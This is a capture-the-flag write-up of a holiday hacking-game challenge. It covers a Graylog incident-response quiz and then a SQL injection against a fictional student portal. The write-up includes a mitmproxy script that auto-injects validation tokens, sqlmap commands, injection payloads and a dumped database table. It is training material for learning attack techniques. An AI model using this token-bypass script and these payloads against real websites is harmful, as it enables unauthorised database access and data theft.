Paper Scraps Hunting
Graylog to the rescue
After solving the CAPTEHA and winnit a lifetime supply of cookiez for Krampus, he provided you with some further clues. He first pointed you to some paper scraps he found in the vents, which he collected by using the Turtle Doves… Then he mentions that he stored some scanned copies of the paper scrps on his server at: studentportal.elfu.org. However, he forgot his access credentials, so he asked you to hack your way in and retrieve those images:
Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there. What is the name of Santa’s cutting-edge sleigh guidance system? For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.
If you need, you can get further hints by visiting Pepper Minstix in the dormitory. Luckily you don’t need to walk anymore, as Krampus updated your badge with a new firmware, that lets you teleport within the Elf University Campus… How cool is that!
Once you talk with Minstix, he says hge will help you out, but only after you help him with some issue he is facing:
It’s me - Pepper Minstix. Normally I’m jollier, but this Graylog has me a bit mystified. Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala. Some Elf U computers were hacked, and I’ve been tasked with performing incident response. Can you help me fill out the incident response report using our instance of Graylog? It’s probably helpful if you know a few things about Graylog. Event IDs and Sysmon are important too. Have you spent time with those? Don’t worry - I’m sure you can figure this all out for me! Click on the All messages Link to access the Graylog search interface! Make sure you are searching in all messages! The Elf U Graylog server has an integrated incident response reporting system. Just mouse-over the box in the lower-right corner. Login with the username elfustudent and password elfustudent.
To solve this technical challenge, you need to get familiar with Graylog. You can do this either via the in-game terminal or by browsing to graylog.elfu.org in a new tab. In order to submit your answers though, you need to open the terminal and hover over the bottom right corner or the input forms to appear (also available at this link). For the information gathering it may be easier to navigate to the service in a separate browser tab.
To get the hints, you will need to answer these 10 questions below:
Q1 - What is the path and filename of the first malicious file downloaded by Minty?
This can be easily found by searching for the username minty, enabling TargetFileName column and browsing through the log entries later in time (towards the end of all logs available). This will eventually lead you the following answer C:\Users\minty\Downloads\cookie_recipe.exe.
Q2 - What was the ip:port the malicious file connected to first?
Within the same search results, enable columns DesinationIpAddress and DestinationPort and look for values that seem anomalous. I found the IP 192.168.247.175 and ports 4443 and 4444 that seemed out of the ordinary, so I tried and the combination 192.168.247.175:4444 was accepted as correct answer.
Q3 - What was the first command executed by the attacker?
If you examine the log entry right after the one which was proiding the IP and Port for the previous answer, you will see this CommandLine property: C:\Windows\system32\cmd.exe /c “whoami “. Seems awfully suspicious, and indeed it holds the correct answer: whoami.
Q4 - What is the one-word service name the attacker used to escalate privileges?
So to answer this I first had to Google how services can be started on Windows systems, and found that it is usually done by calling some command that stats like sc start … so I searched the Graylog server for this string and found a lot of entries involving the webexservice which was the correct answer.
Q5 - What is the path & filename of the binary ran by the attacker to dump credentials?
For this question you should search for text exe and within the results look for the string password. You should find a suspiciously named .exe called by someone, which holds the correct answer: C:\cookie.exe.
Q6 - Which account name was used to pivot to another machine?
To answer this, you should notice that not all log entries have the AccountName value, so you should search for exists: AccountName which returns log entries where this value exists. In the results you will find minty quite often but this would not be accepted, so try some others from the results, perhaps alabaster will work… :)
Q7 - What is the time (HH:MM:SS) the attacker makes a Remote Desktop connection to another machine?
For this I had to learn that in Windows environment the act of opening a remote connection via RDP causes an event to be generated with ID of 4624 and LogonType 10, so I searched for these values in Graylog with EventID: 4624 AND LogonType:10 and found the correct timestamp to be: 06:04:28.
Q8 - What is the ‘SourceHostName,DestinationHostname,LogonType’ of this connection?
For answering this question, you should look for LogonType 3 and the existence of Source and Destination hostnames. I made the following search query: LogonType: 3 AND exists:SourceHostName AND exists:DestinationHostname which gave the following solution: ELFU-RES-WKS2,elfu-res-wks3,3 (after several rounds of trial and error based on search results).
Q9 - What is the path & filename of the secret document being transferred from the third host to the second host?
First you should look for the account alabaster because the attacked was disguised under this attack, then look in the result and look for a pdf file that seems suspicious. Correct answer will be: C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf.
10 - What is the IPv4 address the secret research document was exfiltrated to?
To answer this, I listed all log entries, went the the very and and turned on CommandLine and TargetIpAddress columns, in order to see that PowerShell command was used to upload this secret pdf to some website. This revealed the target IP address: 104.22.3.84.
So now the questions are answered and Pepper is ready to share some useful hints:
That’s it - hooray! Have you had any luck retrieving scraps of paper from the Elf U server? You might want to look into SQL injection techniques. OWASP is always a good resource for web attacks. For blind SQLi, I’ve heard Sqlmap is a great tool. In certain circumstances though, you need custom tamper scripts to get things going!
Main objective
So Pepper Minstix hinted at the tool called sqlmap which can help us exploit vulnerable databases tied to web applications that accept input from the users. This is quite a valuable hint. Further information in the hint include:
- https://www.youtube.com/watch?v=0T6-DQtzCgM&feature=youtu.be
- https://www.owasp.org/index.php/SQL_Injection
- https://pen-testing.sans.org/blog/2017/10/13/sqlmap-tamper-scripts-for-the-win
The given target (studentportal.elfu.org) has several endpoints, which could be targeted with a Web App exploit:
studentportal.elfu.org/index.phpstudentportal.elfu.org/students.phpstudentportal.elfu.org/apply.phpstudentportal.elfu.org/check.php
The first and the second do not accept any input, so they are not going to be very useful for this objective, however the apply.php and check.php do accept user input through HTML forms. Of these two, I first decided to take a look at the latter, as it only has one input field, which can be enough for the purpose. Do note that the HTML form in the check.php endpoint has a different target specified: application-check.php, so the sqlmap attack should be directed to this URL instead of check.php.
<form id="check" action="/application-check.php" method="get" onsubmit="submitApplication()">
<h1>Check Application Status</h1>
<div>
<label for="inputEmail">Elf Mail Address</label>
<input name="elfmail" type="email" id="inputEmail" placeholder="Email address" required="" autofocus="">
</div>
<input type="hidden" id="token" name="token" value="">
<div>
<input type="submit" value="Check Status">
</div>
</form>
In the HTML source code, notice that the submission form also has a hidden field called token, that also gets sent along the request when the button is clicked. Searching a bit further in the page source you can see a short javascript code which handles the update of this input field and the actual form submission:
function submitApplication() {
console.log("Submitting");
elfSign();
document.getElementById("check").submit();
}
function elfSign() {
var s = document.getElementById("token");
const Http = new XMLHttpRequest();
const url='/validator.php';
Http.open("GET", url, false);
http.send(null);
if (Http.status === 200) {
console.log(Http.responseText);
s.value = Http.responseText;
}
}
So now you know that when you call sqlmap and attack elfmail, you also need to set up some kind script that automatically fetches the token and inserts it into the requests, as it will be rejected otherwise. My first idea was to write a tamper script for sqlmap, which defines the custom transformation that inserts the token into the payload of each request. However, for some reason I could not get this tamper script to work, I always received Invalid or expired token error for every request generated by sqlmap.
So next, I looked around on the net for an alternative solution, and found the mitmproxy tool which has a nice python API that helped with the token injection. The github repo for the mitmproxy project has several useful examples, which helped me learn enough of the API to get going with the token injecting service. The script I used was very simple and easy to understand:
from mitmproxy import http
import requests
def request(flow: http.HTTPFlow) -> None:
# obtain the token from the validator.php endpoint
r = requests.get("https://studentportal.elfu.org/validator.php")
# insert the token into the request that is intercepted by mitmproxy
flow.request.query["token"] = r.content.decode("utf-8")
Below is a sample screenshot of the mitmproxy console when looking at a sample request that was already injected with the necessary token:
Now that the proxy is set up (IP: 192.168.56.7, PORT: 8080), it was time to let sqlmap loose on the database and find some vulnerabilities. To start the scan you need to run the following command specifying the URL and the query parameter you want to exploit (which was -p elfmail in this case):
~/sqlmap ▶ python sqlmap.py --proxy='http://192.168.56.7:8080' --url="https://studentportal.elfu.org/application-check.php?elfmail=email@example.com" -p elfmail -risk 3
___
__H__
___ ___[.]_____ ___ ___ {1.3.12.34#dev}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[*] starting @ 10:40:06 /2020-01-01/
[10:40:06] [INFO] testing connection to the target URL
[10:40:09] [INFO] target URL content is stable
[10:40:10] [INFO] heuristic (basic) test shows that GET parameter 'elfmail' might be injectable (possible DBMS: 'MySQL')
[10:40:11] [INFO] heuristic (XSS) test shows that GET parameter 'elfmail' might be vulnerable to cross-site scripting (XSS) attacks
[10:40:11] [INFO] testing for SQL injection on GET parameter 'elfmail'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n]
[10:40:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:40:31] [INFO] GET parameter 'elfmail' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your application is still pending!")
[...REDACTED FOR BREVITY...]
[10:46:19] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
GET parameter 'elfmail' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 279 HTTP(s) requests:
---
Parameter: elfmail (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: elfmail=asd' AND 7313=7313 AND 'PMOS'='PMOS
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: elfmail=asd' AND (SELECT 1941 FROM(SELECT COUNT(*),CONCAT(0x716b626b71,(SELECT (ELT(1941=1941,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'EUey'='EUey
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: elfmail=asd' AND (SELECT 1748 FROM (SELECT(SLEEP(5)))MzkM) AND 'qFnu'='qFnu
---
[10:59:36] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.1, Nginx 1.14.2
back-end DBMS: MySQL >= 5.0
Now you can see that sqlmap, in cooperation with the mitmproxy, successfully identified the DB type and found 3 vulnerabilities in the elfmail input field:
- boolean-based blind
- error-based
- time-based blind
Next you can use sqlmap explore the database further. Passing the flag –dbs to the same command as before will list all databases, while the flag –tables will list all the tables within a chosen database. Once you found the correct combination of flags, you can use the flag –dump to dump the table’s content. In this case these flags worked to find the paper scraps:
~/sqlmap ▶ python3 sqlmap.py --proxy=[...] --url=[...] -p elfmail -D elfu -T krampus --dump
database: elfu
Table: krampus
[6 entries]
+----+-----------------------+
| id | path |
+----+-----------------------+
| 1 | /krampus/0f5f510e.png |
| 2 | /krampus/1cc7e121.png |
| 3 | /krampus/439f15e6.png |
| 4 | /krampus/667d6896.png |
| 5 | /krampus/adb798ca.png |
| 6 | /krampus/ba417715.png |
+----+-----------------------+
Prepending the file names from the exfiltrated table with the site’s URL will finally reveal the paper scraps. Once you download and reassemble all of them, you can read the full text of the letter and answer the objective.
wget https://studentportal.elfu.org/krampus/0f5f510e.png
wget https://studentportal.elfu.org/krampus/1cc7e121.png
wget https://studentportal.elfu.org/krampus/439f15e6.png
wget https://studentportal.elfu.org/krampus/667d6896.png
wget https://studentportal.elfu.org/krampus/adb798ca.png
wget https://studentportal.elfu.org/krampus/ba417715.png
What is the name of Santa’s cutting-edge sleigh guidance system?:
Super Sled-o-matic